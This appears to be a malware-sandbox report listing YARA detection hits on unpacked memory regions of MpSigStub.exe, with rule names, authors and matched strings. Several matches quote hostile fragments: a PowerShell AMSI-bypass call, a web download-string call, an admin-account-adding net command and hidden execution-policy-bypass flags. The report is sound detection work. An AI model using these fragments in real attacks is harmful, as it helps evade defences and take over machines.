38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x8172:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack	HackTool_Samples	Hacktool	unknown	0x2faf1:$c: Failed to load SAM functions
38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0x6077:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bde3d286.84.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bcaa4da9.108.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be2d6086.53.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x75e3:$s1: http:// 0x9606:$s1: http:// 0xb158:$s1: http:// 0xb295:$s1: http:// 0xb2b0:$s1: http:// 0xb2cf:$s1: http:// 0xb2e9:$s1: http:// 0xb307:$s1: http:// 0xb323:$s1: http:// 0xba5e:$s1: http:// 0xba7a:$s1: http:// 0xbaa2:$s1: http:// 0xbaca:$s1: http:// 0xbb02:$s1: http:// 0xbb8d:$s1: http:// 0xf6bb:$s1: http:// 0x11592:$s1: )551{nn 0x115aa:$s1: http:// 0x29863:$s1: http:// 0x34204:$s1: http:// 0x3533c:$s1: http://
38.3.MpSigStub.exe.138be2d6086.53.raw.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x28bc0:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x28a9d:$rat2: rat.(Core).generateBeacon 0x28aba:$rat3: rat.gJitter 0x28ac8:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x28b2e:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x28b96:$rat8: rat/modules/netsweeper.(Pinger).listen 0x28bc0:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x28bee:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x28a74:$winblows: rat/platforms/win.(winblows).GetStage
38.3.MpSigStub.exe.138bd51435e.70.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x1319b:$one6: Shell Environ$("COMSPEC") & " /c
38.3.MpSigStub.exe.138bd51435e.70.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be1deebe.25.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x527d5:$x1: \Mini rat\
38.3.MpSigStub.exe.138be1deebe.25.unpack	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xf55f3:$r1: p^o^w^e^r^s^h^E^L^L 0xf55f3:$r2: p^o^w^e^r^s^h^E^L^L
38.3.MpSigStub.exe.138be1deebe.25.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x8c12c:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be1deebe.25.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x8c12c:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be1deebe.25.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x8ca9c:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be1deebe.25.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x8ca9c:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be1deebe.25.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0xc620:$r2: nuR\noisreVtnerruC
38.3.MpSigStub.exe.138be1deebe.25.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be1deebe.25.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
38.3.MpSigStub.exe.138be1deebe.25.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
38.3.MpSigStub.exe.138bd193eb1.195.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd1720c9.183.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x68c6:$a: Cookies: Sym1.0 0x6867:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x55b1:$one3: srvCheckresponded
38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x7edf:$s1: stratum+tcp://
38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.148.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
38.3.MpSigStub.exe.138bd223b1a.148.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
38.3.MpSigStub.exe.138bdbb54b5.125.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x13d1b:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bdbb68b9.112.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x12917:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bce160d6.17.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x272c7:$s2: system.net.webclient).downloadstring('http
38.3.MpSigStub.exe.138bcce283a.74.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bcce283a.74.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bcce283a.74.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
38.3.MpSigStub.exe.138bcce283a.74.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd0cfd72.157.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x8b10:$s1: 7ZSfx%03x.cmd 0x849:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1459:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
38.3.MpSigStub.exe.138be22418a.26.raw.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0xd509:$x1: \Mini rat\
38.3.MpSigStub.exe.138be22418a.26.raw.unpack	SUSP_PDB_Strings_Keylogger_Backdoor	Detects PDB strings used in backdoors or keyloggers	Florian Roth	0xc78c:$: \Debug\KeyLogger
38.3.MpSigStub.exe.138bd223b1a.197.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
38.3.MpSigStub.exe.138bd223b1a.197.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
38.3.MpSigStub.exe.138bcce32d4.72.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bd1d8af6.146.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.3.MpSigStub.exe.138bd1d8af6.146.unpack	dump_tool	unknown	@patrickrolsen	0x4f151:$s4: fgdump 0x4f15b:$s5: fgexec 0x4f15b:$s6: fgexecpipe
38.3.MpSigStub.exe.138bd19185d.194.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be8f860a.87.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x9702:$s1: stratum+tcp://
38.3.MpSigStub.exe.138be8f860a.87.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be8f860a.87.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
38.3.MpSigStub.exe.138bdbb7ebd.111.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x11313:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bd1720c9.207.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x68c6:$a: Cookies: Sym1.0 0x6867:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
38.3.MpSigStub.exe.138be1459b2.104.raw.unpack	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x3194b:$hook: C6 06 FF 46 C6 06 25 0x31956:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
38.3.MpSigStub.exe.138be1459b2.104.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x3343a:$x3: rimrun.com
38.3.MpSigStub.exe.138be1459b2.104.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x33db6:$s15: [+] OK! I Closed The Two Socket.
38.3.MpSigStub.exe.138be1459b2.104.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x33419:$x4: DropperBackdoor
38.3.MpSigStub.exe.138be1459b2.104.raw.unpack	APT_APT41_POISONPLUG	Detects APT41 malware POISONPLUG	Florian Roth	0x22663:$s2: [-]write failed[%d] 0x22651:$s3: [-]load failed
38.3.MpSigStub.exe.138be1459b2.104.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x35c45:$s5: emailAddress= 0x35c35:$s7: www.naver.com 0x35c04:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0x35be6:$x3: fjiejffndxklfsdkfjsaadiepwn
38.3.MpSigStub.exe.138be1459b2.104.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bdac8e06.213.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0xff09:$a1: logKextPassKey 0xa31b0:$a1: logKextPassKey 0xe0ac:$a4: com_fsb_iokit_logKext 0xff2c:$a4: com_fsb_iokit_logKext 0x61420:$a4: com_fsb_iokit_logKext 0xa31de:$b1: logKext Password: 0xa31f3:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0xff09:$c1: logKextPassKey 0xa31b0:$c1: logKextPassKey
38.3.MpSigStub.exe.138bdac8e06.213.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x968b1:$x11: \\.\mimidrv
38.3.MpSigStub.exe.138bdac8e06.213.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x14c97:$sa1: -ENC 0x4340:$sc2: -noprofile 0x4603:$sc2: -noprofile 0xdd24f:$sc2: -noprofile 0x4352:$sd2: -noninteractive 0x4615:$sd2: -noninteractive 0xdd261:$sd2: -noninteractive 0x13719:$se1: -EP bypass 0x14c7f:$se3: -ExecutionPolicy BypasS
38.3.MpSigStub.exe.138bdac8e06.213.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bdac8e06.213.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
38.3.MpSigStub.exe.138bd16fc75.208.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x8d1a:$a: Cookies: Sym1.0 0x8cbb:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
38.3.MpSigStub.exe.138be2d6086.218.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x75e3:$s1: http:// 0x9606:$s1: http:// 0xb158:$s1: http:// 0xb295:$s1: http:// 0xb2b0:$s1: http:// 0xb2cf:$s1: http:// 0xb2e9:$s1: http:// 0xb307:$s1: http:// 0xb323:$s1: http:// 0xba5e:$s1: http:// 0xba7a:$s1: http:// 0xbaa2:$s1: http:// 0xbaca:$s1: http:// 0xbb02:$s1: http:// 0xbb8d:$s1: http:// 0xf6bb:$s1: http:// 0x11592:$s1: )551{nn 0x115aa:$s1: http:// 0x29863:$s1: http:// 0x34204:$s1: http:// 0x3533c:$s1: http://
38.3.MpSigStub.exe.138be2d6086.218.raw.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x28bc0:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x28a9d:$rat2: rat.(Core).generateBeacon 0x28aba:$rat3: rat.gJitter 0x28ac8:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x28b2e:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x28b96:$rat8: rat/modules/netsweeper.(Pinger).listen 0x28bc0:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x28bee:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x28a74:$winblows: rat/platforms/win.(winblows).GetStage
38.3.MpSigStub.exe.138bd16fc75.184.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x8d1a:$a: Cookies: Sym1.0 0x8cbb:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
38.3.MpSigStub.exe.138bd21de7c.209.unpack	dump_tool	unknown	@patrickrolsen	0xabcb:$s4: fgdump 0xabd5:$s5: fgexec 0xabd5:$s6: fgexecpipe
38.3.MpSigStub.exe.138bcce32d4.166.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x8a46:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack	HackTool_Samples	Hacktool	unknown	0x303c5:$c: Failed to load SAM functions
38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0x694b:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x34a8b:$: Decrypt.txt 0x34791:$: DECRYPT.txt 0x35d3a:$: DECRYPT.txt 0x35fe4:$: DECRYPT.txt
38.3.MpSigStub.exe.138bd0af157.153.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x26a61:$sa1: -enc 0xa2648:$sa1: -enc 0x26a57:$sb1: -w hidden 0x26a3c:$sc1: -nop 0xa2639:$sc1: -noP 0x26a51:$sd1: -noni 0x26a46:$se1: -ep bypass 0x26a41:$sf1: -sta 0xa263e:$sf1: -sta
38.3.MpSigStub.exe.138bd0af157.153.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x50f59:$e4: exe.erolpxei
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_Baldr	Yara detected Baldr	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_Knot	Yara detected Knot Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_Nephilim	Yara detected Nephilim Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138bd0af157.153.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x20ca7:$a: XTREME 0x20e11:$a: XTREME 0x20c11:$h: Xtreme RAT
38.3.MpSigStub.exe.138bd0af157.153.unpack	korlia	unknown	Nick Hoffman	0xc5845:$d: 00 62 69 73 6F 6E 61 6C 00
38.3.MpSigStub.exe.138be3e4c13.121.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xe8ca:$payload_and_input1: eval(request. 0xe8ad:$tagasp_short1: <%@ 0xe8c8:$tagasp_short1: <%e 0x1ace7:$tagasp_short1: <%\xCF 0x1c53d:$tagasp_short1: <%\xE9 0x6aa6:$tagasp_short2: %> 0xe8c6:$tagasp_short2: %> 0xe8ec:$tagasp_short2: %> 0x1963b:$tagasp_short2: %> 0x27a28:$tagasp_short2: %> 0xe8c8:$tagasp_long13: <%ev 0xe8ad:$tagasp_long20: <%@pagelanguage="jscript 0xc5d1:$jsp4: public
38.3.MpSigStub.exe.138be5658a9.38.raw.unpack	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x4ca4:$n1: file:// 0x1f26e:$n1: file:// 0x1f706:$ax2: 5.153.58.45
38.3.MpSigStub.exe.138be5658a9.38.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xd379:$s1: stratum+tcp://
38.3.MpSigStub.exe.138bdbb7ebd.150.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x11313:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138be2939bd.52.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bdac8e06.95.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0xff09:$a1: logKextPassKey 0xa31b0:$a1: logKextPassKey 0xe0ac:$a4: com_fsb_iokit_logKext 0xff2c:$a4: com_fsb_iokit_logKext 0x61420:$a4: com_fsb_iokit_logKext 0xa31de:$b1: logKext Password: 0xa31f3:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0xff09:$c1: logKextPassKey 0xa31b0:$c1: logKextPassKey
38.3.MpSigStub.exe.138bdac8e06.95.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x968b1:$x11: \\.\mimidrv
38.3.MpSigStub.exe.138bdac8e06.95.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x14c97:$sa1: -ENC 0x4340:$sc2: -noprofile 0x4603:$sc2: -noprofile 0xdd24f:$sc2: -noprofile 0x4352:$sd2: -noninteractive 0x4615:$sd2: -noninteractive 0xdd261:$sd2: -noninteractive 0x13719:$se1: -EP bypass 0x14c7f:$se3: -ExecutionPolicy BypasS
38.3.MpSigStub.exe.138bdac8e06.95.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bdac8e06.95.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bdbb54b5.110.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x13d1b:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bcf08dba.68.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bda7fcc2.60.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x45b6:$s1: sekurlsa::msv 0x4638:$s7: sekurlsa::ssp 0x45f7:$s11: sekurlsa::pth
38.3.MpSigStub.exe.138bcd0731e.140.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bcd0731e.140.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
38.3.MpSigStub.exe.138bcd0731e.140.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bcce283a.167.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bcce283a.167.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bcce283a.167.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
38.3.MpSigStub.exe.138bcce283a.167.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bcce32d4.72.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bcce32d4.72.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bcce32d4.72.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
38.3.MpSigStub.exe.138bcce32d4.72.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138beac8d52.115.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x8b2a:$: odhyrfjcnfkdtslt
38.3.MpSigStub.exe.138beac8d52.115.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x8552:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
38.3.MpSigStub.exe.138beac8d52.115.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x4631:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x4e3c:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x4e4c:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
38.3.MpSigStub.exe.138beaf1482.85.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x28d37:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138beaf1482.85.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x274df:$: DECRYPT_YOUR_FILES
38.3.MpSigStub.exe.138beaf1482.85.raw.unpack	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0x28cef:$x1: reflective_inject_dll 0x28da6:$x1: reflective_inject_dll
38.3.MpSigStub.exe.138beaf1482.85.raw.unpack	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x28d09:$x1: reflectively inject a dll into a process. 0x28cef:$x4: reflective_inject_dll 0x28da6:$x4: reflective_inject_dll 0x28cef:$x8: reflective_inject_dll 0x28da6:$x8: reflective_inject_dll 0x28da6:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
38.3.MpSigStub.exe.138beaf1482.85.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.3.MpSigStub.exe.138bda7f0be.62.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x51ba:$s1: sekurlsa::msv 0x523c:$s7: sekurlsa::ssp 0x51fb:$s11: sekurlsa::pth
38.3.MpSigStub.exe.138beac654a.116.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0xb332:$: odhyrfjcnfkdtslt
38.3.MpSigStub.exe.138beac654a.116.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0xad5a:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
38.3.MpSigStub.exe.138beac654a.116.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x6e39:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x7644:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x7654:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
38.3.MpSigStub.exe.138bd025981.88.raw.unpack	Gen_Net_LocalGroup_Administrators_Add_Command	Detects an executable that contains a command to add a user account to the local administrators group	Florian Roth	0x153af:$x1: net localgroup administrators abc /add
38.3.MpSigStub.exe.138bd025981.88.raw.unpack	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x13e08:$cUp: Upload failed! [Remote error code: 0x13ee8:$GDGSYDLYR: GDGSYDLYR_%
38.3.MpSigStub.exe.138bd0cf16e.156.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x9714:$s1: 7ZSfx%03x.cmd 0x85d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x144d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x205d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
38.3.MpSigStub.exe.138bde3d286.107.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be567efd.37.raw.unpack	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x2650:$n1: file:// 0x1cc1a:$n1: file:// 0x1d0b2:$ax2: 5.153.58.45
